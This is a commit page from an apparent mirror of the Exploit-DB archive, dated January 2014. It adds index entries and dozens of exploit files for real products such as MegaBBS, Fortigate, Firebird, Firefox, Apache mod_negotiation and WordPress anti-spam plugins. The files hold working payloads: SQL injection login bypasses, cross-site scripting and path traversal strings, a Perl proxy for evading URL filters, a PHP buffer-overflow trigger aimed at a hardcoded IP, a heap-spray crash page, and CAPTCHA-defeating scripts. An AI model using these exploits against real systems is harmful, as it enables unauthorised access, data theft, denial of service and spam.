bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 01_21_2014

Browse source
This commit is contained in:
Offensive Security 2014-01-21 04:28:26 +00:00
parent 1c19131a67
commit acf3e755a7
46 changed files with 1349 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

45
files.csv
View file

@ -27841,3 +27841,48 @@ id,file,description,date,author,platform,type,port
31023,platforms/windows/remote/31023.html,"Qvod Player 2.1.5 'QvodInsert.dll' ActiveX Control Remote Buffer Overflow Vulnerability",2008-01-11,anonymous,windows,remote,0
31024,platforms/hardware/remote/31024.txt,"F5 BIG-IP <= 9.4.3 'SearchString' Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,nnposter,hardware,remote,0
31025,platforms/cgi/webapps/31025.txt,"Garment Center 'index.cgi' Local File Include Vulnerability",2008-01-14,Smasher,cgi,webapps,0
31026,platforms/hardware/remote/31026.pl,"Fortinet Fortigate CRLF Characters URL Filtering Bypass Vulnerability",2008-01-14,Danux,hardware,remote,0
31027,platforms/php/webapps/31027.txt,"pMachine Pro 2.4.1 Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,fuzion,php,webapps,0
31028,platforms/php/webapps/31028.txt,"Article Dashboard 'admin/login.php' Multiple SQL Injection Vulnerabilities",2008-01-15,Xcross87,php,webapps,0
31029,platforms/php/webapps/31029.pl,"Peter's Math Anti-Spam for WordPress 0.1.6 Plugin Audio CAPTCHA Security Bypass Vulnerability",2008-01-15,Romero,php,webapps,0
31030,platforms/php/webapps/31030.pl,"SpamBam WordPress Plugin Key Calculation Security Bypass Vulnerability",2007-01-15,Romero,php,webapps,0
31031,platforms/hardware/remote/31031.txt,"8E6 R3000 Internet Filter 2.0.5.33 URI Security Bypass Vulnerability",2008-01-16,nnposter,hardware,remote,0
31034,platforms/php/webapps/31034.txt,"MyBB <= 1.2.10 'moderation.php' Multiple SQL Injection Vulnerabilities",2008-01-16,waraxe,php,webapps,0
31035,platforms/php/webapps/31035.txt,"Clever Copy 3.0 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2008-01-17,hadihadi,php,webapps,0
31036,platforms/windows/local/31036.txt,"CORE FORCE Firewall 0.95.167 and Registry Modules Multiple Local Kernel Buffer Overflow Vulnerabilities",2008-01-17,"Sebastian Gottschalk",windows,local,0
31037,platforms/php/webapps/31037.txt,"phpAutoVideo 2.21 sidebar.php loadpage Parameter Remote File Inclusion",2008-01-18,"H-T Team",php,webapps,0
31038,platforms/php/webapps/31038.txt,"phpAutoVideo 2.21 index.php cat Parameter XSS",2008-01-18,"H-T Team",php,webapps,0
31039,platforms/windows/remote/31039.txt,"BitDefender Products Update Server HTTP Daemon Directory Traversal Vulnerability",2008-01-19,"Oliver Karow",windows,remote,0
31040,platforms/windows/remote/31040.html,"Toshiba Surveillance Surveillix DVR 'MeIpCamX.DLL' 1.0 ActiveX Control Buffer Overflow Vulnerabilities",2008-01-20,rgod,windows,remote,0
31041,platforms/php/webapps/31041.txt,"bloofoxCMS 0.3 Multiple Input Validation Vulnerabilities",2008-01-20,"AmnPardaz ",php,webapps,0
31042,platforms/asp/webapps/31042.txt,"MegaBBS 1.5.14b 'upload.asp' Cross-Site Scripting Vulnerability",2008-01-21,Doz,asp,webapps,0
31043,platforms/cgi/webapps/31043.txt,"Alice Gate2 Plus Wi-Fi Router Cross-Site Request Forgery Vulnerability",2008-01-21,WarGame,cgi,webapps,0
31044,platforms/php/webapps/31044.txt,"singapore 0.10.1 Modern Template 'gallery' Parameter Cross-Site Scripting Vulnerability",2008-01-21,trew,php,webapps,0
31045,platforms/php/webapps/31045.txt,"Small Axe Weblog 0.3.1 'ffile' Parameter Remote File Include Vulnerability",2008-01-21,anonymous,php,webapps,0
31046,platforms/windows/remote/31046.cpp,"GlobalLink 'GLChat.ocx' 2.5.1 ActiveX Control 'ChatRoom()' Buffer Overflow Vulnerability",2008-01-09,Knell,windows,remote,0
31047,platforms/multiple/remote/31047.txt,"Novemberborn sIFR 2.0.2/3 'txt' Parameter Cross-Site Scripting Vulnerability",2008-01-22,"Jan Fry",multiple,remote,0
31048,platforms/php/webapps/31048.txt,"PacerCMS 0.6 'id' Parameter Multiple SQL Injection Vulnerabilities",2008-01-22,RawSecurity.org,php,webapps,0
31049,platforms/php/webapps/31049.txt,"DeluxeBB 1.1 'attachments_header.php' Cross-Site Scripting Vulnerability",2008-01-22,NBBN,php,webapps,0
31050,platforms/multiple/remote/31050.php,"Firebird <= 2.0.3 Relational Database 'protocol.cpp' XDR Protocol Remote Memory Corruption Vulnerability",2008-01-28,"Damian Frizza",multiple,remote,0
31051,platforms/linux/remote/31051.txt,"Mozilla Firefox 2.0 chrome:// URI JavaScript File Request Information Disclosure Vulnerability",2008-01-19,"Gerry Eisenhaur",linux,remote,0
31052,platforms/linux/remote/31052.java,"Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability",2008-01-22,"Stefano Di Paola",linux,remote,0
31053,platforms/php/remote/31053.php,"PHP <= 5.2.5 cURL 'safe mode' Security Bypass Vulnerability",2008-01-23,"Maksymilian Arciemowicz",php,remote,0
31055,platforms/asp/webapps/31055.txt,"Multiple Web Wiz Products Remote Information Disclosure Vulnerability",2008-01-23,"AmnPardaz ",asp,webapps,0
31056,platforms/windows/remote/31056.py,"HFS HTTP File Server 1.5/2.x Multiple Security Vulnerabilities",2008-01-23,"Felipe M. Aragon",windows,remote,0
31057,platforms/osx/dos/31057.html,"Apple iPhone Mobile Safari Memory Exhaustion Remote Denial of Service Vulnerability",2008-01-24,fuzion,osx,dos,0
31058,platforms/asp/webapps/31058.txt,"Pre Hotel and Resorts 'user_login.asp' Multiple SQL Injection Vulnerabilies",2008-01-25,milad_sa2007,asp,webapps,0
31059,platforms/asp/webapps/31059.txt,"E-SMART CART 'Members Login' Multiple SQL Injection Vulnerabilies",2008-01-25,milad_sa2007,asp,webapps,0
31060,platforms/php/webapps/31060.txt,"Drake CMS 0.4.9 'index.php' Cross-Site Scripting Vulnerability",2008-01-25,"Omer Singer",php,webapps,0
31061,platforms/php/webapps/31061.txt,"trixbox 2.4.2 user/index.php Query String XSS",2008-01-25,"Omer Singer",php,webapps,0
31062,platforms/php/webapps/31062.txt,"trixbox 2.4.2 maint/index.php Query String XSS",2008-01-25,"Omer Singer",php,webapps,0
31063,platforms/php/webapps/31063.txt,"WebCalendar 1.1.6 pref.php Query String XSS",2008-01-25,"Omer Singer",php,webapps,0
31064,platforms/php/webapps/31064.txt,"WebCalendar 1.1.6 search.php adv Parameter XSS",2008-01-25,"Omer Singer",php,webapps,0
31065,platforms/php/webapps/31065.txt,"F5 BIG-IP Application Security Manager 9.4.3 'report_type' Cross-Site Scripting Vulnerability",2008-01-26,nnposter,php,webapps,0
31066,platforms/php/webapps/31066.txt,"Mambo MOStlyCE 2.4 Module 'connector.php' Cross-Site Scripting Vulnerability",2008-01-28,"AmnPardaz ",php,webapps,0
31067,platforms/php/webapps/31067.txt,"ClanSphere 2007.4.4 'install.php' Local File Include Vulnerability",2008-01-28,p4imi0,php,webapps,0
31068,platforms/php/webapps/31068.txt,"Mambo MOStlyCE Module 2.4 Image Manager Utility Arbitrary File Upload Vulnerability",2008-01-28,"AmnPardaz ",php,webapps,0
31069,platforms/php/webapps/31069.txt,"eTicket 1.5.6-RC4 'index.php' Cross-Site Scripting Vulnerability",2008-01-28,jekil,php,webapps,0
31070,platforms/asp/webapps/31070.txt,"ASPired2Protect Login Page SQL Injection Vulnerability",2008-01-28,T_L_O_T_D,asp,webapps,0
31071,platforms/cgi/webapps/31071.txt,"VB Marketing 'tseekdir.cgi' Local File Include Vulnerability",2008-01-28,"Sw33t h4cK3r",cgi,webapps,0
31072,platforms/windows/remote/31072.html,"Symantec Backup Exec System Recovery Manager 7.0 FileUpload Class Unauthorized File Upload Vulnerability",2007-01-05,titon,windows,remote,0
31073,platforms/java/webapps/31073.html,"SunGard Banner Student 7.3 'add1' Parameter Cross-Site Scripting Vulnerability",2008-01-29,"Brendan M. Hickey",java,webapps,0

Can't render this file because it is too large.

9
platforms/asp/webapps/31042.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27368/info
MegaBBS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
MegaBBS 1.5.14b is vulnerable; other versions may also be affected.
http://www.example.com/path/profile-upload/upload.asp?target=code

9
platforms/asp/webapps/31055.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27419/info
Web Wiz Forums, NewsPad, and Rich Text Editor are prone to a remote information-disclosure vulnerability because they fail to properly sanitize user-supplied input.
An attacker can exploit this issue to retrieve arbitrary files in the context of the webserver process. Information obtained may aid in further attacks; other attacks are also possible.
This issue affects Forums 9.07, NewsPad 1.02, and Rich Text Editor 4.0; other versions may also be vulnerable.
http://www.example.com/RTE_file_browser.asp?look=&sub=\.....\\\.....\\\.....\\http://www.example.com/RTE_file_browser.asp?look=save&sub=\.....\\\.....\\\.....\\\.....\\\.....\\\

9
platforms/asp/webapps/31058.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27450/info
Pre Hotel and Resorts is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Passing the following will bypass the authentication process:
' or '

13
platforms/asp/webapps/31059.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/27452/info
E-SMART CART is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following exploit information is available:
Passing:
' or '
will bypass the authentication process.

13
platforms/asp/webapps/31070.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/27474/info
ASPired2Protect is prone to an SQL-injection vulnerability because it fails to adequately sanitize user-supplied data.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following exploit information is available:
Passing:
' or '
will bypass the authentication process.

7
platforms/cgi/webapps/31043.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/27374/info
Alice Gate2 Plus Wi-Fi routers are prone to a cross-site request-forgery vulnerability.
An attacker can exploit this issue to alter administrative configuration on affected devices. Specifically, altering the wireless encryption settings on devices has been demonstrated. Other attacks may also be possible.
http://www.example.com/cp06_wifi_m_nocifr.cgi?wlChannel=Auto&wlRadioEnable=on

7
platforms/cgi/webapps/31071.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/27475/info
VB Marketing is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability using directory-traversal strings to include local script code in the context of the application. This may allow the attacker to access sensitive information that may aid in further attacks.
http://www.example.com/cgi-bin/tseekdir.cgi?location=/etc/passwd%00

222
platforms/hardware/remote/31026.pl Executable file
View file

@ -0,0 +1,222 @@
source: http://www.securityfocus.com/bid/27276/info
Fortinet Fortigate is prone to a vulnerability that can allow attackers to bypass the device's URL filtering.
An attacker can exploit this issue to view unauthorized websites, bypassing certain security restrictions. This may lead to other attacks.
This issue affects Fortigate-1000 3.00; other versions may also be affected.
NOTE: This issue may be related to the vulnerability described in BID 16599 (Fortinet Fortigate URL Filtering Bypass Vulnerability).
#!/usr/bin/perl
########################################
# fortiGuard.pl v0.1 - http://www.macula-group.com/
#
# # URL Filtering Bypass proof of concept
# Author: Daniel Regalado aka Danux... Hacker WannaBe!!! (only some
minnor modifications from sinhack code)
# Based on PoC from sinhack research labs -> sakeru.pl
#
#FortiGuard's URL blocking functionality can be bypassed by
specially-crafted HTTP requests that are terminated by the CRLF
character
#instead of the LF characters and changing version of HTTP to 1.0
without sending Host: Header and Fragmenting the GET and POST Requests
#
#Tested On: fortiGate-1000 3.00, build 040075,070111
#
#This code has been released Only for educational purposes. The author
cannot be held responsible for any bad use.
# Usage:
# 1) perl fortiGuard.pl
# 2) Configure your browser's proxy at localhost:5050
# 3) Have fun.
# --- Start Of Script---
use strict;
use URI;
use IO::Socket;
my $showOpenedSockets=1; #Activate the console logging
my $debugging=0;
my $server = IO::Socket::INET->new ( #Proxy Configuration
LocalPort => 5050, #Change the listening port here
Type => SOCK_STREAM,
Reuse => 1,
Listen => 10);
binmode $server;
print "Waiting for connections on port 5050 TCP...\n";
while (my $browser = $server->accept()) { #When a connection occure...
binmode $browser;
my $method="";
my $content_length = 0;
my $content = 0;
my $accu_content_length = 0;
my $host;
my $hostAddr;
my $httpVer;
my $line;
while (my $browser_line = <$browser>) { #Get the Browser commands
unless ($method) {
($method, $hostAddr, $httpVer) = $browser_line =~ /^(\w+)
+(\S+) +(\S+)/;
my $uri = URI->new($hostAddr);
$host = IO::Socket::INET->new ( #Opening the connexion to the
remote host
PeerAddr=> $uri->host,
PeerPort=> $uri->port ) or die "couldn't open $hostAddr";
if ($showOpenedSockets) { #Connection logs
#print "Source:".$browser->peerhost."\n";
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) =
localtime(time);
$year += 1900;
$mon += 1;
printf ("\n%04d-%02d-%02d %02d:%02d:%02d
",$year,$mon,$mday,$hour,$min,$sec);
print $browser->peerhost." -> ".$uri->host.":".$uri->port."
$method ".$uri->path_query."\n";;
}
binmode $host;
my $char;
if ($method == "GET") { #Fragmention the "GET" query
foreach $char ('G','E','T',' ') { #I know, there is better
way to do it,
print $host $char; #but I'm tired and lazy...
}
} elsif ($method == "POST") { #Fragmentation of "POST" query
foreach $char ('P','O','S','T',' ') {
print $host $char;
}
} else {
print $host "$method "; #For all the other methods, send
them without modif
print "*";
}
$httpVer="HTTP/1.0"; #Forzando a version 1.0
print $host $uri->path_query . " $httpVer\r\n"; #Send the rest
of the query (url and http version)
#next;
}
$content_length = $1 if $browser_line=~/Content-length: +(\d+)/i;
$accu_content_length+=length $browser_line;
foreach $line (split('\n', $browser_line)) { #Fragment the Host query
if ($line =~ /^Host:/ ) {
#my $char="";
#my $word="";
#my $bogus="";
#($bogus,$word) = split(' ', $line);
#foreach $char ('H','o','s','t',':',' ') {
#print $host $char;
#}
#print $host $word."\r\n";
} else {
print $host "$line\r\n"; #For all the other lines, send
them without modif
}
if ( $debugging == 1 && $method == "POST" ) {
print "$line\n";
}
}
#Danux Clave para terminar el Request y enviarlo al servidor
web, de otra forma se queda esperando este ultimo la peticion
print $host "\r\n";
last if $browser_line =~ /^\s*$/ and $method ne 'POST';
if ($browser_line =~ /^\s*$/ and $method eq "POST") {
$content = 1;
last unless $content_length;
next;
}
#print length $browser_line . " - ";
if ($content) {
$accu_content_length+=length $browser_line;
last if $accu_content_length >= $content_length;
}
}
$content_length = 0;
$content = 0;
$accu_content_length = 0;
my $crcount=0;
my $totalcounter=0;
my $packetcount=0;
while ( my $host_line = <$host> ) { #Reception of the result from the server
$totalcounter+=length $host_line;
print $browser $host_line; #Send them back to the browser
#print $host_line if ( ! $content ); #Send them back to the browser
if ($host_line=~/Content-length: +(\d+)/i) {
$content_length = $1;
#print " * Expecting $content_length\n"; #if ($debugging);
}
if ($host_line =~ m/^\s*$/ and not $content) {
$content = 1;
#print " * Beginning of the data section\n";
}
if ($content) {
#$accu_content_length+=length $host_line;
if ($content_length) {
#print " * binary data section\n";
my $buffer;
my $buffersize = 512;
if ($content_length < $buffersize) { $buffersize = $content_length; }
while ( my $nbread = read($host, $buffer, $buffersize)) {
print "#";
$packetcount++;
$accu_content_length+=$nbread;
#last if $accu_content_length >= $content_length;
print $browser $buffer; #Send them back to the browser
#print $buffer;
#print "\n(#$packetcount) ";
#print "total: $totalcounter content_length:
$content_length acc: $accu_content_length\t";
my $tmp1 = $content_length - $accu_content_length;
#print "length-accu= $tmp1\n";
if ($tmp1 < $buffersize) {
$buffersize = $tmp1;
#print "new buffersize = $buffersize\n";
}
}
#print "Out of the content while\n";
}
}
#print "(#$packetcount) ";
#print "total: $totalcounter content_length: $content_length
acc: $accu_content_length\t";
#my $tmp1 = $content_length - $accu_content_length;
#print "length-accu= $tmp1\n";
last if ($accu_content_length >= $content_length and $content ==
1 and $content_length);
}
#print "\nOut for a while\n";
if ($browser) { $browser -> close; } #Closing connection to the browser
if ($host) { $host -> close; } #Closion connection to the server
}
# --- EOF ---

21
platforms/hardware/remote/31031.txt Executable file
View file

@ -0,0 +1,21 @@
source: http://www.securityfocus.com/bid/27309/info
8e6 R3000 Internet Filter is prone to a vulnerability that allows attackers to bypass URI filters.
Attackers can exploit this issue by sending specially crafted HTTP request packets for an arbitrary website. Successful exploits allow attackers to view sites that the device is meant to block access to. This could aid in further attacks.
R3000 Internet Filter 2.0.05.33 is vulnerable; other versions may also be affected.
packet 1: GE
packet 2: T / HTTP/1.0\r\n
packet 1: GET / HTTP/1.0
X-SomeHeader: ...
....
packet 2: X-SomeOtherHeader: ....
Host: www.example.com
...

9
platforms/java/webapps/31073.html Executable file
View file

File diff suppressed because one or more lines are too long

11
platforms/linux/remote/31051.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/27406/info
Mozilla Firefox is prone to an information-disclosure vulnerability because it fails to restrict access to local JavaScript, images and stylesheets files.
Attackers can exploit this issue to gain access to potentially sensitive information that could aid in further attacks.
Firefox 2.0.0.11 is vulnerable; other versions may also be affected.
NOTE: For an exploit to succeed, a user must have an addon installed that does not store its contents in a '.jar' file. The attacker would have to target a specific addon that uses "flat" packaging.
<script>pref = function(x, y){document.write(x + ' -> ' + y + '<br>');};</script> <script src='chrome://downbar/content/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fProgram%20Files%2fMozilla%20Thunderbird%2fgreprefs%2fall.js'></script>

26
platforms/linux/remote/31052.java Executable file
View file

@ -0,0 +1,26 @@
source: http://www.securityfocus.com/bid/27409/info
Apache 'mod_negotiation' is prone to an HTML-injection and an HTTP response-splitting vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, and influence or misrepresent how web content is served, cached, or interpreted; other attacks are also possible.
// Tested on IE 7 and FF 2.0.11, Flash plugin 9.0 r115
// Compile with flex compiler
package
{
import flash.display.Sprite;
import flash.net.*
public class TestXss extends flash.display.Sprite {
public function TestXss(){
var r:URLRequest = new URLRequest('http://victim/<img%20src=sa%20
onerror=eval(document.location.hash.substr(1))>#alert(123)');
r.method = 'POST';
r.data = unescape('test');
r.requestHeaders.push(new URLRequestHeader('Accept', 'image/jpeg; q=0'));
navigateToURL(r, '_self');
}
}
}

9
platforms/multiple/remote/31047.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27394/info
Novemberborn sIFR is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Versions prior to sIFR 2.0.3 and 3r278 are vulnerable.
https://www.example.com/<fontname>.swf?txt=<a href="http://www.example2.com">click me!</a> http://www.example.com/fonts/FuturaLt.swf?txt=%3Ca%20href=%22javascript:alert(document.cookie)%22%3Eclick%20me!%3C/a%3E&textalign=left&offsetTop=-2&textcolor=

73
platforms/multiple/remote/31050.php Executable file
View file

@ -0,0 +1,73 @@
source: http://www.securityfocus.com/bid/27403/info
Firebird is prone to an integer-overflow vulnerability because it fails to ensure that integer values aren't overrun. Attackers may exploit this issue to overflow a buffer and to corrupt process memory.
Attackers may be able to execute arbitrary machine code in the context of an affected application. Failed exploit attempts will likely result in a denial-of-service condition.
<?php
/** * FIREBIRD REMOTE BUFFER OVERFLOW.
* ITDEFENCE.ru Proof-of-Concept (POC)
* Eugene Minaev (underwater@itdefence.ru)
*
* Integer overflow in Firebird SQL 1.0.3 and earlier, 1.5.x before 1.5.6, 2.0.x before 2.0.4, and 2.1.x before 2.1.0 * RC1 might allow remote attackers to execute arbitrary code via crafted op_receive, op_start, op_start_and_receive, * op_send, (5) op_start_and_send, and (6) op_start_send_and_receive XDR requests, which triggers memory corruption.
*
* Vulnerable packages
*
* Firebird SQL 1.0.3 and before.
* Firebird SQL 1.5.5 and before.
* Firebird SQL 2.0.3 and before.
* Firebird SQL 2.1.0 Beta 2 and before.
*
* Non-vulnerable packages
*
* Firebird SQL 1.5.6 (to be released)
* Firebird SQL 2.0.4 (to be released)
* Firebird SQL 2.1.0 RC1
*
* src/remote/protocol.cpp:417
*
* MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_request));
* MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_incarnation));
* MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_transaction));
* MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_message_number));
* return xdr_request(xdrs, data->p_data_request,
* data->p_data_message_number,
* data->p_data_incarnation) ? P_TRUE(xdrs, p) : P_FALSE(xdrs, p);
*
* Firebird Connect Packet
* * 0x0000 00 00 00 00 00 02 00 00-00 00 00 01 08 00 45 00 ..............E.
* 0x0010 00 BC 00 00 00 00 40 06-00 25 C0 A8 7C 63 C0 A8 .&#1112;....@..%&#1040;&#1025;|c&#1040;&#1025;
* 0x0020 7C 63 0B EA 0E 94 00 00-00 01 00 00 00 01 50 10 |c.&#1082;.?........P.
* 0x0030 40 00 00 00 00 00 00 00-00 01 00 00 00 13 00 00 @...............
* 0x0040 00 02 00 00 00 1D 00 00-00 3C 43 3A 5C 50 72 6F .........<C:\Pro
* 0x0050 67 72 61 6D 20 46 69 6C-65 73 5C 46 69 72 65 62 gram Files\Fireb
* 0x0060 69 72 64 5C 46 69 72 65-62 69 72 64 5F 31 5F 35 ird\Firebird_1_5
* 0x0070 5C 65 78 61 6D 70 6C 65-73 5C 45 4D 50 4C 4F 59 \examples\EMPLOY
* 0x0080 45 45 2E 66 64 62 00 00-00 02 00 00 00 13 01 04 EE.fdb..........
* 0x0090 52 4F 4F 54 04 09 75 6E-64 65 72 77 68 61 74 06 ROOT..underwhat.
* 0x00A0 00 00 00 00 00 08 00 00-00 01 00 00 00 02 00 00 ................
* 0x00B0 00 03 00 00 00 02 00 00-00 0A 00 00 00 01 00 00 ................
* 0x00C0 00 02 00 00 00 03 00 00-00 04 ..........
* * Firebird Login Packet.
*
* 0x0000 00 00 00 00 00 02 00 00-00 00 00 01 08 00 45 00 ..............E.
* 0x0010 00 94 00 00 6C 6C 40 06-93 E0 C0 A8 7C 63 C0 A8 .?..ll@.?&#1072;&#1040;&#1025;|c&#1040;&#1025;
* 0x0020 7C 63 0B EA 0E 94 00 00-00 95 00 00 00 11 50 10 |c.&#1082;.?...?....P.
* 0x0030 40 00 00 00 00 00 00 00-00 13 00 00 00 00 00 00 @...............
* 0x0040 00 3C 43 3A 5C 50 72 6F-67 72 61 6D 20 46 69 6C .<C:\Program Fil
* 0x0050 65 73 5C 46 69 72 65 62-69 72 64 5C 46 69 72 65 es\Firebird\Fire
* 0x0060 62 69 72 64 5F 31 5F 35-5C 65 78 61 6D 70 6C 65 bird_1_5\example
* 0x0070 73 5C 45 4D 50 4C 4F 59-45 45 2E 66 64 62 00 00 s\EMPLOYEE.fdb..
* 0x0080 00 1E 01 1C 06 53 59 53-44 42 41 1E 0B 51 50 33 .....SYSDBA..QP3
* 0x0090 4C 4D 5A 2F 4D 4A 68 2E-3A 04 00 00 00 00 3E 00 LMZ/MJh.:.....>.
* 0x00A0 00 00 ..
*
*/
$___suntzu = "\x00\x00\x00\x4a" . str_repeat( "\x4a" , 3000);
for ($temp = 0; $temp < 5; $temp ++){
$___zuntzu = fsockopen('192.168.124.99',3050);
fwrite($___zuntzu , $___suntzu);
fclose($___zuntzu );
sleep(1);
}
?>

9
platforms/osx/dos/31057.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27442/info
Apple iPhone is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue by enticing an unsuspecting user to view a maliciously crafted webpage. Successful attacks cause a kernel panic, crashing the device. Given the nature of this issue, remote code execution may also be possible, but this has not been confirmed.
iPhone 1.1.2 and 1.1.3 are affected; other versions may also be vulnerable.
<html><body><script> function Demo() { var shellcode; var addr; var fill; alert('attempting a crash!'); shellcode = unescape('%u0c0c'); fill = unescape('%ucccc'); addr = 0x02020202; var b = fill; while (b.length <= 0x40000) b+=b; var c = new Array(); for (var i =0; i<36; i++) { c[i] = b.substring(0, 0x100000 - shellcode.length) + shellcode + b.substring(0, 0x100000 - shellcode.length) + shellcode + b.substring(0, 0x100000 - shellcode.length) + shellcode + b.substring(0, 0x100000 - shellcode.length) + shellcode; } } </script> <input type='button' onClick='Demo()' value='Go!'> </body></html>

9
platforms/php/remote/31053.php Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27413/info
PHP cURL is prone to a 'safe mode' security-bypass vulnerability.
Attackers can use this issue to gain access to restricted files, potentially obtaining sensitive information that may aid in further attacks.
The issue affects PHP 5.2.5 and 5.2.4.
var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00&quot;.__FILE__)));

12
platforms/php/webapps/31027.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/27282/info
pMachine Pro is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The issues affect pMachine Pro 2.4.1; other versions may also be vulnerable.
NOTE: pMachine Pro has been replaced by ExpressionEngine. The vendor recommends upgrading.
http://www.example.com/pm/language/spanish/preferences.php?L_PREF_NAME[855]=<script>alert(ZOMG!);</script>

7
platforms/php/webapps/31028.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/27286/info
Article Dashboard is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/admin/login.php?user=admin'-- | /*

60
platforms/php/webapps/31029.pl Executable file
View file

@ -0,0 +1,60 @@
source: http://www.securityfocus.com/bid/27287/info
Peter's Math Anti-Spam for WordPress is prone to a security-bypass vulnerability.
This issue occurs when presenting a visitor with challenge data to determine if they are a legitimate user or an automaton. The challenge data is poorly obfuscated and can be interpreted by script code.
Attackers can leverage this issue to bypass the security measures provided by the plugin via an automated script. This could aid in spam distribution and other attacks.
Peter's Math Anti-Spam for WordPress 0.1.6 is vulnerable; other versions may also be affected.
$ cat math_spam.pl
#!/usr/bin/perl -w
require bytes;
my $buffer;
my $number;
my $op1;
my $op2;
my %numberPrints = ("0045", 0,
"00c5", 1,
"0485", 2,
"4309", 3,
"0205", 4,
"0847", 5,
"0601", 6,
"0644", 7,
"0405", 8,
"0031", 9);
my %numberSizes = ( 0, 4045,
1, 3983,
2, 4431,
3, 4250,
4, 4595,
5, 5389,
6, 4949,
7, 4436,
8, 4584,
9, 5009);
my $PLUS_SIZE = 7365;
open (INFILE, "<$ARGV[0]");
binmode(INFILE);
sysseek(INFILE, 14, 0); #That "0" third argument makes seeking
absoulte
sysread(INFILE, $buffer, 2);
#$number = sprintf("%x%x", map {ord($_)}
split(//,substr($buffer,0,2)));
$number = sprintf("%.2x%.2x", map {ord($_)} split(//,$buffer));
$op1 = $numberPrints{$number};
sysseek(INFILE, $numberSizes{$op1} + $PLUS_SIZE - 2, 1); #That
third "1" argument makes seeking relative
sysread(INFILE, $buffer, 2);
$number = sprintf("%.2x%.2x", map {ord($_)} split(//,$buffer));
$op2 = $numberPrints{$number};
print $op1 . " + " . $op2 . " = " . ($op1+$op2) . "\n";
close(INFILE);

102
platforms/php/webapps/31030.pl Executable file
View file

@ -0,0 +1,102 @@
source: http://www.securityfocus.com/bid/27291/info
SpamBam is prone to a security-bypass vulnerability because client-accessible data can be used to calculate verification keys.
Attackers can exploit this issue to submit arbitrary form data via automated scripts and distribute spam.
#!/usr/bin/perl -w
# Defeating SpamBam exploit
# by Jose Palazon (josem.palazon@gmail.com) (a.k.a. palako)
# Vulnerable software:
# SpamBam (http://wordpress.org/extend/plugins/spambam/) by Gareth Heyes
# Vulnerability:
# No matter how hard you ofuscate or encrypt your code, never, under no
circunstances, rely
# any security aspect on the client. Never!
# How the plugin works:
# It generates a pseudo-random code both on the client and the server to
generate a key.
# On form submit, both key values are checked and they should match to
allow comment insertion.
#How the exploit works:
# It does nothing but acting as a client. It parses the html, extracts
the javascript, process it
# to calculate the key and fills the hidden field with it.
# Solution:
# Sorry guys but there's no fix for this. It'ss just a design flaw.
use WWW::Mechanize;
use JavaScript::SpiderMonkey;
my $tmpContent;
my $javascriptCode;
my $spamBamKey;
die ("Usage: spambam.pl <post url> <author> <email> <comment>\n") unless
$ARGV[3];
my $url = $ARGV[0];
my $author = $ARGV[1];
my $email = $ARGV[2];
my $comment = $ARGV[3];
my $mech = WWW::Mechanize->new( autocheck => 1 );
$mech->get($url);
# WWW::Mechanize doesn't support javascript, so the field
comment_spambamKey won't be
# recognized by $mech->field. Thus, I'll make an update_html adding the
field, and for
# this purpose I save first the original contents. Indeed, substitition
